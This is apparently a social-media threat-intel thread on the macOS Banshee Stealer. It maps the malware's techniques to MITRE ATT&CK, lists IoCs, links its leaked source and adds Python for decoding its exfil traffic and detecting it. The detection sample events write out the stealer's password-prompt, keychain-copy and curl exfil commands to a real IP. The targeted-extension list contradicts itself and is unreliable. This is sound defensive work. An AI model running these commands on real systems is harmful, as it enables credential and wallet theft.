🖥️ Secure Mac? Not always… #BansheeStealer is infecting #macOS devices and evolving with new features. Don't be complacent: #malware for #Mac is a reality. 🔍 https://bit.ly/43tLKae
Banshee Stealer: a stealer that attacks macOS users

The dangerous Banshee Stealer malware, built for the Mac, has learned to evade macOS's built-in security and keeps evolving. How can you protect yourself?

Kaspersky
Banshee Stealer manages to bypass Apple's XProtect - Le Monde Informatique

This revision of the malware, discovered in July 2024, can fool Apple's security scanner, but according to a security researcher the danger is...

LeMondeInformatique
Critical Warning For 100 Million Apple Users—New Hack Attack Confirmed

Security researchers have warned that a new variant of the Banshee credential-stealer is targeting Apple’s 100 million macOS users. Here’s what you need to know.

Forbes
Banshee: The Stealer That "Stole Code" From MacOS XProtect - Check Point Research

Check Point Researchers uncover a new version of Banshee macOS, finding that its string encryption is the exact copy of Apple's XProtect

Check Point Research
Banshee Stealer variant targets macOS users

Security researchers have discovered a new variant of the macOS-focused malware known as Banshee Stealer.

TARNKAPPE.INFO

@PwnieFan Thanks for the share, this is great. #BANSHEEStealer recently had its source code posted to VXUG and exhibits the following MITRE ATT&CK aligned TTPs based on my source code analysis. It's a really good opportunity for orgs to get some foundational macOS stealer detections in place since these TTPs will likely get recycled into other stealer strains.

Execution
Command and Scripting Interpreter: AppleScript (T1059.002): Banshee Stealer executes the vast majority of its commands via AppleScript osascript command line invocation.
User Execution: Malicious File (T1204.002): Banshee Stealer relies on the end user to execute the malicious payload.

Defense Evasion
Virtualization/Sandbox Evasion: System Checks (T1497.001): Banshee Stealer will perform a series of rudimentary debugger and virtual machine checks.
Debugger Evasion (T1622): Banshee Stealer checks for a debugger by examining the status of the system P_TRACED flag.
Abuse Elevation Control Mechanism: TCC Manipulation (T1548.006): Banshee Stealer resets the TCC settings for AppleEvents via the native macOS binary tccutil.

Credential Access
Input Capture: GUI Input Capture (T1056.002): Banshee Stealer generates a dialog box via osascript to prompt the user for their credentials and will validate them using the native Apple binary dscl.
Credentials from Password Stores: Keychain (T1555.001): Banshee Stealer attempts to copy the user’s macOS keychain file from /Library/Keychains/login.keychain-db to /Users/<username>/password-entered.
Credentials from Password Stores: Credentials from Web Browsers (T1555.003): Banshee Stealer attempts to copy the user’s web browser information to include browser history, cookies, and logins from Chrome, Firefox, Brave, Edge, Vivaldi, Yandex, Opera, OperaGX, and Safari.
Steal Web Session Cookie (T1539): Banshee Stealer attempts to copy the user’s web browser information to include browser history, cookies, and logins from Chrome, Firefox, Brave, Edge, Vivaldi, Yandex, Opera, OperaGX, and Safari.
Unsecured Credentials: Credentials in Files (T1552.001): Banshee Stealer attempts to copy the macOS Notes SQLite database along with a number of other file types from common locations on the host to include the Desktop and Documents folders.

Discovery
System Information Discovery (T1082): Banshee Stealer profiles the host to detect the presence of virtualization using the built-in macOS binary system_profiler.
System Location Discovery: System Language Discovery (T1614.001): Banshee Stealer checks the host’s language locale setting via _CFLocaleCopyPreferredLanguages for whether it is set to ‘RU’.
System Network Configuration Discovery: Internet Connection Discovery (T1016.001): Banshee Stealer queries hxxps://freeipapi[.]com/api/json/ or hxxps://api.ipify[.]org/?format=json via HTTP curl request to ensure internet connectivity and to gather the victim’s public IP address.

Collection
Archive Collected Data: Archive via Utility (T1560.001): Banshee Stealer calls native macOS binary ditto to generate a ZIP archive for eventual exfiltration.
Data Staged: Local Data Staging (T1074.001): Banshee Stealer will create new folders called ‘FileGrabber’, ‘Notes’, /tmp/tempAppleScript, <temporary_path>/Passwords, <temporary_path>/Browsers, <temporary_path>/Wallets, and /Users/<username>/password-entered to store stolen credentials and other files of interest prior to exfiltration.

Command and Control
Data Encoding: Standard Encoding (T1132.001): Banshee Stealer base64-encodes the stolen data within the ZIP archive prior to exfiltration.
Encrypted Channel: Symmetric Cryptography (T1573.001): Banshee Stealer employs XOR encryption against the ZIP archive prior to base64-encoding the results and exfiltrating the data.

Exfiltration
Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol (T1048.003): Banshee Stealer exfiltrates the stolen data via a curl POST command to hxxp://45.142.122[.]92/send/.

Impact
Financial Theft (T1657): Banshee Stealer will gather and steal various files from a macOS victim host to include cryptocurrency wallets, login keychains, browser cookies, and browser extension information.

Indicators of Compromise
HTTP URLs for Public IP Address Collection/Internet Checks:
hxxps://freeipapi[.]com/api/json/
hxxps://api.ipify[.]org/?format=json
HTTP URL for Exfiltration: hxxp://45.142.122[.]92/send/
Exfiltration IP Address: 45.142.122[.]92
Network: 45.142.122.0/24
Autonomous System Number: 216246
Autonomous System Label: Aeza Group Ltd.
Regional Internet Registry: RIPE NCC
Country: RU

TARGETED BROWSER EXTENSIONS
nkbihfbeogaeaoehlefnkodbefgpgknn == MetaMask Wallet
hnfanknocfeofbddgcijnmhnfnkdnaad == Coinbase Wallet
egjidjbpglichdcondbcbdnbeeppgdph == Trust Wallet
fdjamakpfbbddfjaooikfcpapjohcfmg == Dashlane Password Manager
bfnaelmomeimhlpmgjnjophhpkkoljpa == Phantom Wallet
inogffkifehjmjkojolhagpbmdjajfjf == ???
afbcbjpbpfadlkmhmclhkeeodmamcflc == Math Wallet
aeachknmefphepccionboohckonoeemg == Coin98 Wallet
dnahimkjmphecfmphdplpidnpdbgihjm == ???
fhbohimaelbohpjbbldcngcnapndodjp == Binance Wallet
hpglfhgfnhbgpjdenjgmdgoeiappafln == ???
ddjbpkjkbihpkkjoiidijondfnnilgbd == ???
ljfoeinjpaedjfecbmggjgodbgkmjkjk == Trezor Wallet
fhbohimaelbohpjbbldcngcnapndodjp == Sollet Wallet
agofbccfdbggmjhbjligajffaedmpfi == BitKeep
oblahjcienboiocobpfmpkhgbilacbof == MyEtherWallet (MEW)
dmkamcknogkgcdfhhbddcghachkejeap == Keplr Wallet
eogjbkambcobpejogjednkhnkdlpjkgf == ZenGo Wallet
ffnbelfdoeiohenkjibnmadjiehjhajb == FoxWallet
nkpfkohfaabomajpmcikkgipnddjbjlm == XDEFI Wallet
cjfkaebgdjmgkknhmeddmbjfkkllcfma == Rabby Wallet
cgjclchllmlobfdhpdfbfblakllcdcp == SafePal Wallet
cgpbghdcejifbdmicolodockpdpejkm == D'CENT Wallet
ekpbnlianmehonjglfliphieffnpagjk == Portis
bhemafnepdahjhdibdejjdojplpanpjm == Clover Wallet
eobpgiikknjeagdbnljopepfkfgjcom == Talisman Wallet
cefoeaflfeaogknfendclmchngnpadh == MathWallet (duplicate corrected)
cegnkklhnkfhpgpgdddpbglgbfjcbka == Cyano Wallet
mfibgodchngikcneecnpcenooljdfcd == Opera Crypto Wallet
njehdbnfdjbclbggngdihjghpknebfn == Polkadot-JS
kgpidhfbnidjcldpngdonkekmpkgihke == Solflare Wallet
cegmkloiabeockglkffemjljgbbannn == Ellipal Wallet
kjklkfoolpolbnklekmicilkhigclekd == AlphaWallet
bnnkeaggkakalmkbfbcglpggdobgfoa == ZelCore
plnnhafklcflphmidggcldodbdennyg == AT.Wallet
hjbkalghaiemehgdhaommgaknjmbnmf == Loopring Wallet
dljopojhfmopnmnfocjmaiofbbifkbfb == Halo Wallet
pghngobfhkmclhfdbemffnbihphmpcgb == Pillar Wallet
keoamjnbgfgpkhbgmopocnkpnjkmjdd == Ambire Wallet
nhdllgjlkgfnoianfjnbmcjmhdelknbm == Blocto Wallet
fgdbiimlobodfabfjjnpefkafofcojmb == Hashpack Wallet
blpcdojejhnenclebgmmbokhnccefgjm == Defiat Wallet
kjbhfnmamllpocpbdlnpjihckcoidje == Opera Crypto
efnhgnhicmmnchpjldjminakkdnidbop == Titan Wallet
kmccchlcjdojdokecblnlaclhobaclj == ONE Wallet
bpcedbkgmedfpdpcabaghjbmhjoabgmh == MewCX
aipfkbcoemjllnfpblejkiaogfpocjba == Frontier Wallet
nmngfmokhjdbnmdlajibgniopjpckpo == ChainX Wallet
nehbcjigfgjgehlgimkfkknemhnhpjo == Bifrost Wallet
ejbalbakoplchlghecdalmeeeajnimhm == MetaMask
ofhbbkphhbklhfoeikjpcbhemlocgigb == Coinbase Wallet
lefigjhibehgfelfgnjcoodflmppomko == Trust Wallet
alncdjedloppbablonallfbkeiknmkdi == Crypto.com DeFi Wallet
bfnaelmomeimhlpmgjnjophhpkkoljpa == Phantom
lpbfigbdccgjhflmccincdaihkmjjfgo == Guarda Wallet
achbneipgfepkjolcccedghibeloocbg == MathWallet
fdgodijdfciiljpnipkplpiogcmlbmhk == Coin98
ljfoeinjpaedjfecbmggjgodbgkmjkjk == Nami Wallet
mcbpblocgmgfnpjjppndjkmgjaogfceg == Binance Wallet
geceibbmmkmkmkbojpegbfakenjfoenal == Exodus
ibnejdfjmmkpcnlpebklmnkoeoihofec == Atomic Wallet
ffnbelfdoeiohenkjibnmadjiehjhajb == Yoroi Wallet
kjebfhglflciofebmojinmlmibbmcmkdo == Trezor Wallet
jaoafjlleohakjimhphimldpcldhamjp == Sollet Wallet
blnieiiffboillknjnepogjhkgnoapac == BitKeep
odbfpeeihdkbihmopkbjmoonfanlbfcl == MyEtherWallet (MEW)
leibnlghpgpjigganjmbkhlmehlnaedn == Keplr Wallet
hmnminpbnkpndojhkipgkmokcocmgllb == ZenGo Wallet
bocpokimicclglpgehgiebilfpejmgjo == FoxWallet
ljfoeinjpaedjfecbmggjgodbgkmjkjk == XDEFI Wallet
ilajcdmbpocfmipjioonlmljbmljbfpj == Rabby Wallet
hnmpcagpplmpfojmgmnngilcnanddlhb == SafePal Wallet
odbfpeeihdkbihmopkbjmoonfanlbfcl == D'CENT Wallet
ahkfhobdidabdlaphghgikhlpdbnodpa == Portis
jihneinfbfkaopkpnifgbfdlfpnhgnko == Clover Wallet
hpglfhgfnhbgpjdenjgmdgoeiappafln == Talisman Wallet
cmeakgjggjdhccnmkgpjdnaefojkbgmb == MathWallet (duplicate corrected)
ffabmkklhbepgcgfonabamgnjfjdbjoo == Cyano Wallet
cdjkjpfjcofdjfbdojhdmlflffdafngk == Opera Crypto Wallet
apicngpmdlmkkjfbmdhpjedieibfklkf == Polkadot-JS
lhkfcaflljdcedlgkgecfpfopgebhgmb == Solflare Wallet
omgopbgchjlaimceodkldgajioeebhab == Ellipal Wallet
kehbljcfpanhajpidcmblpdnlphelaie == AlphaWallet
lnehnlppemineeojdjkcpgoockkboohn == ZelCore
kjebfhglflciofebmojinmlmibbmcmkdo == AT.Wallet
hjebgbdpfgbcjdopfbbcpcjefcmhpdpn == Loopring Wallet
pklfcgcfchhcokldoonkijijfpgmjilh == Halo Wallet
lplmibmljignbdmkclofcackoolcfnhj == Pillar Wallet
kibokekadkmfjfckkbgndphcjejhoial == Ambire Wallet
nhdllgjlkgfnoianfjnbmcjmhdelknbm == Blocto Wallet
kdfmmohbkjggjlmelhhmcgohadhdeijn == Hashpack Wallet
blpcdojejhnenclebgmmbokhnccefgjm == Defiat Wallet
kjbhfnmamllpocpbdlnpjihckcoidje == Opera Crypto
aoilkoeledabkfogmczlbdfhbdkoggko == Titan Wallet
jmchmkecamhbiokiopfpjjmfkpbbjjaf == ONE Wallet
mgffkfbidcmcenlkgaebhoojfcegdndl == MewCX
kdgecbhaddlgffpdffafpikmjekjflff == Frontier Wallet
pfilbfecknpnlbcioakkpcmkfckpogeg == ChainX Wallet
mehhoobkfknjlamaohobkhfnoheajlfi == Bifrost Wallet

#cti #BANSHEEStealer #malware #threatintel
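The Command and Control and Exfiltration entries above describe the outbound pipeline as: ZIP via ditto, XOR, base64, curl POST. The following is an added example, not code from the post or from the Banshee source, that reverses that pipeline on a captured POST body so the staged archive can be inspected. Everything specific to it is constructed: the XOR key (HYPOTHETICAL_KEY), the assumption that the key is a short repeating one (up to 8 bytes; the real value should be read from the leaked source), and the archive member names, which only mirror the staging folders named under Data Staged. The key recovery needs nothing from the malware: it uses bytes that are fixed in any comment-less ZIP as known plaintext.

```python
"""Reverse the exfil encoding described above: base64(XOR(zip)).
Added example; key, sample archive and member names are constructed."""
import base64
import io
import zipfile

ZIP_LOCAL_SIG = b"PK\x03\x04"  # first bytes of any ZIP with at least one member
ZIP_EOCD_SIG = b"PK\x05\x06"   # start of the 22-byte end-of-central-directory record

# Assumed key for this example only; the real value lives in the leaked source.
HYPOTHETICAL_KEY = b"\x5a\xa5\x3c\xc3"


def xor_bytes(data, key):
    """Repeating-key XOR (its own inverse)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def encode_exfil(zip_bytes, key):
    """Attacker side of the pipeline: XOR the archive, then base64 it."""
    return base64.b64encode(xor_bytes(zip_bytes, key)).decode("ascii")


def known_plaintext(n):
    """Offsets whose plaintext is fixed in a comment-less, non-ZIP64 archive
    of n bytes: the local-file-header signature at 0, and in the EOCD record
    the signature, both zero disk-number fields and the zero comment length."""
    eocd = n - 22
    known = {i: ZIP_LOCAL_SIG[i] for i in range(4)}
    known.update({eocd + i: ZIP_EOCD_SIG[i] for i in range(4)})
    known.update({eocd + i: 0 for i in range(4, 8)})
    known.update({n - 2: 0, n - 1: 0})
    return known


def recover_key(raw, max_len=8):
    """Known-plaintext attack on repeating-key XOR. For each candidate key
    length, derive key bytes from the fixed ZIP bytes, reject lengths that
    give conflicting values for one key position, and confirm the survivor
    by checking that the XORed result parses as a ZIP. The 8 consecutive
    known bytes in the EOCD record cover every key position for lengths up
    to 8; longer keys need more known plaintext or the value from the binary."""
    known = known_plaintext(len(raw))
    for k in range(1, max_len + 1):
        key = [None] * k
        consistent = True
        for pos, pt in known.items():
            kb = raw[pos] ^ pt
            if key[pos % k] is None:
                key[pos % k] = kb
            elif key[pos % k] != kb:
                consistent = False
                break
        if consistent and None not in key:
            candidate = bytes(key)
            if zipfile.is_zipfile(io.BytesIO(xor_bytes(raw, candidate))):
                return candidate
    return None


def decode_exfil(blob_b64, key=None):
    """Defender side: base64-decode a captured POST body, recover (or use)
    the XOR key, and return (key, archive member names)."""
    raw = base64.b64decode(blob_b64)
    if key is None:
        key = recover_key(raw)
        if key is None:
            raise ValueError("no repeating XOR key of length <= 8 yields a ZIP")
    with zipfile.ZipFile(io.BytesIO(xor_bytes(raw, key))) as zf:
        return key, zf.namelist()


def summarize(names):
    """Count members per top-level staging folder (Passwords, Browsers, ...)."""
    counts = {}
    for name in names:
        top = name.split("/", 1)[0]
        counts[top] = counts.get(top, 0) + 1
    return counts


def build_sample_archive():
    """Constructed stand-in for the staged ZIP: member paths mirror the
    staging folders named in the post; contents are dummy bytes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("Passwords/login.keychain-db", b"dummy keychain")
        zf.writestr("Browsers/Chrome/Cookies", b"dummy cookies")
        zf.writestr("Browsers/Firefox/logins.json", b"{}")
        zf.writestr("Wallets/Exodus/exodus.wallet", b"dummy wallet")
        zf.writestr("Notes/NoteStore.sqlite", b"SQLite format 3\x00")
        zf.writestr("FileGrabber/Desktop/passwords.txt", b"dummy")
    return buf.getvalue()


if __name__ == "__main__":
    blob = encode_exfil(build_sample_archive(), HYPOTHETICAL_KEY)
    key, names = decode_exfil(blob)  # key recovered, not supplied
    print("key:", key.hex(), "members:", summarize(names))
```

Run as-is, the block round-trips the constructed archive and recovers the key without being told it. On a real capture, pass the POST body to decode_exfil; if the key is longer than the known plaintext can pin down, pass key= with the value taken from the source. The same known-plaintext approach fails on an archive with a ZIP comment or ZIP64 records, which is why the candidate is always confirmed by actually parsing the result.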

Blue Team Win: Network defenders should take some time to review the Banshee Stealer source code hosted by VX Underground on their GitHub page. Even if you have no RE experience, it's one of the most straightforward and easy-to-analyze malware samples I've ever seen. It's also a great learning opportunity for budding malware REs looking to learn about macOS malware and common stealer TTPs.

The Banshee Stealer TTPs mainly consist of living-off-the-land macOS system binaries (ditto, dscl, system_profiler, curl, tccutil, osascript) and present a unique detection opportunity for security teams, especially those with weak or non-existent macOS signatures. While multiple media outlets are saying the malware operation has shut down, I fully expect skids to compile the Banshee Stealer malware verbatim or fork it into a new family. As a result, expect many of the TTPs to be recycled, reinforcing the need for security teams to take a peek under the hood and get some easy macOS detection wins.

I've identified a few preliminary key findings based on my own source code analysis:

* Banshee Stealer is a fully functional macOS-based information stealer which presents itself as a viable cybersecurity threat to the macOS ecosystem.
* Banshee Stealer targets a wide range of macOS browsers, cryptocurrency wallets, file extension types, and browser extensions, making it a highly versatile and dangerous threat to macOS users.
* Banshee Stealer attempts to steal the user’s primary macOS user credentials along with the critical macOS keychain DB file.
* Banshee Stealer employs many native ‘living-off-the-land’ macOS binaries such as ditto, dscl, curl, system_profiler, tccutil, and osascript to action on its objectives. Most security toolsets will not fire for their execution.
* Banshee Stealer employs rudimentary anti-VM/debugger detection mechanisms such as system hardware and software checks along with locale language detection for the RU language code.
* System checks for the Russian language code have historically indicated the malware was intended to avoid infecting victims based out of Russia or the Commonwealth of Independent States (CIS).

Source Code:
https://github.com/vxunderground/MalwareSourceCode/blob/main/MacOS/MacOS.Stealer.Banshee.7z

#cti #reverseengineering #threatintel #ioc #BANSHEEStealer

MalwareSourceCode/MacOS/MacOS.Stealer.Banshee.7z at main · vxunderground/MalwareSourceCode

Collection of malware source code for a variety of platforms in an array of different programming languages. - vxunderground/MalwareSourceCode

GitHub
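As an added example, not code from the post author or the Banshee project, the following Python runs detection logic for the TTPs listed in the reply above, and for the living-off-the-land binaries this post names, over a constructed batch of process-execution events. The event format (one JSON object per line with exe, argv and ppid) is an assumption standing in for whatever an EDR or Endpoint Security feed emits. The osascript dialog text with a hidden answer and the dscl -authonly invocation are assumptions about how the credential prompt and the credential check are issued, since the reply only names the tools; the lookup hosts and the exfil endpoint come from the Indicators of Compromise list. The parent-process correlation at the end is what keeps a lone ditto or curl, which admins run all day, from paging anyone.

```python
"""Rule-based coverage of the living-off-the-land TTPs listed above, run
over constructed process-execution events. Added example, not from the post."""
import json
import re

# Constructed sample events (not real telemetry) shaped like a generic
# EDR / Endpoint Security process-exec feed: one JSON object per line,
# ppid = parent pid. Children of pid 700 play the stealer; children of
# pid 800 are ordinary user activity that should stay quiet.
SAMPLE_EVENTS = r"""
{"ts": 100, "pid": 900, "ppid": 700, "exe": "/usr/sbin/system_profiler", "argv": ["system_profiler", "SPHardwareDataType"]}
{"ts": 101, "pid": 901, "ppid": 700, "exe": "/usr/bin/osascript", "argv": ["osascript", "-e", "display dialog \"macOS wants to access System Settings\" default answer \"\" with hidden answer"]}
{"ts": 102, "pid": 902, "ppid": 700, "exe": "/usr/bin/dscl", "argv": ["dscl", ".", "-authonly", "jdoe", "hunter2"]}
{"ts": 103, "pid": 903, "ppid": 700, "exe": "/usr/bin/tccutil", "argv": ["tccutil", "reset", "AppleEvents"]}
{"ts": 104, "pid": 904, "ppid": 700, "exe": "/bin/cp", "argv": ["cp", "/Users/jdoe/Library/Keychains/login.keychain-db", "/Users/jdoe/password-entered/"]}
{"ts": 105, "pid": 905, "ppid": 700, "exe": "/usr/bin/ditto", "argv": ["ditto", "-c", "-k", "/tmp/tmp.aB3dE", "/tmp/tmp.aB3dE.zip"]}
{"ts": 106, "pid": 906, "ppid": 700, "exe": "/usr/bin/curl", "argv": ["curl", "-s", "https://freeipapi.com/api/json/"]}
{"ts": 107, "pid": 907, "ppid": 700, "exe": "/usr/bin/curl", "argv": ["curl", "-X", "POST", "-d", "@/tmp/tmp.aB3dE.b64", "http://45.142.122.92/send/"]}
{"ts": 200, "pid": 910, "ppid": 800, "exe": "/usr/bin/curl", "argv": ["curl", "-sL", "https://example.org/release.tar.gz"]}
{"ts": 201, "pid": 911, "ppid": 800, "exe": "/usr/bin/ditto", "argv": ["ditto", "-c", "-k", "/Users/jdoe/Documents/project", "/Users/jdoe/Desktop/project.zip"]}
{"ts": 202, "pid": 912, "ppid": 800, "exe": "/usr/bin/osascript", "argv": ["osascript", "-e", "display notification \"Build finished\""]}
"""

IP_CHECK_HOSTS = ("freeipapi.com/api/json", "api.ipify.org")  # from the IoC list
EXFIL_URL = "http://45.142.122.92/send/"                        # from the IoC list
CURL_UPLOAD_FLAGS = {"-d", "--data", "--data-binary", "--data-raw",
                     "-F", "--form", "-T", "--upload-file"}
BARE_IP_HTTP = re.compile(r"http://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?/")


def parse_events(text):
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def base(ev):
    return ev["exe"].rsplit("/", 1)[-1]


def cmd(ev):
    return " ".join(ev["argv"])


def curl_uploads(ev):
    argv = ev["argv"]
    return "POST" in argv or any(a in CURL_UPLOAD_FLAGS for a in argv)


# (technique, rule name, predicate). The "hidden answer" dialog text and the
# dscl "-authonly" form are assumptions about how the tools are invoked.
RULES = [
    ("T1082", "system_profiler hardware profiling (VM check)",
     lambda e: base(e) == "system_profiler" and "SPHardwareDataType" in e["argv"]),
    ("T1056.002", "osascript dialog with hidden (password) answer",
     lambda e: base(e) == "osascript" and "display dialog" in cmd(e) and "hidden answer" in cmd(e)),
    ("T1056.002", "dscl -authonly local password validation",
     lambda e: base(e) == "dscl" and "-authonly" in e["argv"]),
    ("T1548.006", "tccutil reset of AppleEvents",
     lambda e: base(e) == "tccutil" and e["argv"][1:3] == ["reset", "AppleEvents"]),
    ("T1555.001", "login.keychain-db copied by a file utility",
     lambda e: base(e) in ("cp", "ditto", "rsync", "mv") and "login.keychain-db" in cmd(e)),
    ("T1560.001", "ditto -c -k zip archive creation",
     lambda e: base(e) == "ditto" and "-c" in e["argv"] and "-k" in e["argv"]),
    ("T1016.001", "public IP lookup service queried with curl",
     lambda e: base(e) == "curl" and any(h in cmd(e) for h in IP_CHECK_HOSTS)),
    ("T1048.003", "curl upload to the Banshee exfil URL (IoC match)",
     lambda e: base(e) == "curl" and EXFIL_URL in e["argv"]),
    ("T1048.003", "curl upload to a bare-IP plaintext HTTP endpoint",
     lambda e: base(e) == "curl" and curl_uploads(e) and BARE_IP_HTTP.search(cmd(e)) is not None),
]


def evaluate(events):
    """Return one hit per (event, matching rule)."""
    hits = []
    for ev in events:
        for technique, name, pred in RULES:
            if pred(ev):
                hits.append({"ts": ev["ts"], "pid": ev["pid"], "ppid": ev["ppid"],
                             "technique": technique, "rule": name})
    return hits


def correlate(hits, min_techniques=3):
    """Group hits by parent process. A parent whose children cover at least
    min_techniques distinct techniques is reported as a stealer-like chain;
    a lone ditto or curl (routine admin use) stays under the threshold."""
    by_parent = {}
    for h in hits:
        by_parent.setdefault(h["ppid"], set()).add(h["technique"])
    return {ppid: sorted(t) for ppid, t in by_parent.items() if len(t) >= min_techniques}


if __name__ == "__main__":
    hits = evaluate(parse_events(SAMPLE_EVENTS))
    for h in hits:
        print(f'{h["ts"]} pid={h["pid"]} ppid={h["ppid"]} {h["technique"]} {h["rule"]}')
    print("chains:", correlate(hits))
```

The individual rules are deliberately narrow (the exact tccutil service, the ditto flags that produce a ZIP, a POST to a bare IP over plain HTTP) so that each one is cheap to tune; the IoC rule will stop firing as soon as the infrastructure moves, while the generic bare-IP upload rule and the parent-process chain keep working against a recompiled fork.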
Banshee Stealer source code leaked: macOS malware neutralised

Cybercriminals give up: the Banshee Stealer malware for macOS was abandoned after its source code was published.

TARNKAPPE.info
BANSHEE Stealer malware targets more than 100 browser extensions on macOS

Cybersecurity researchers have discovered a new stealer malware designed specifically to attack Apple macOS systems. Dubbed Banshee Stealer,

mecambioaMac
Banshee Stealer: macOS malware targets browser data and crypto wallets

The malware known as Banshee Stealer systematically collects sensitive data from infected Macs, provided users give up their password.

heise online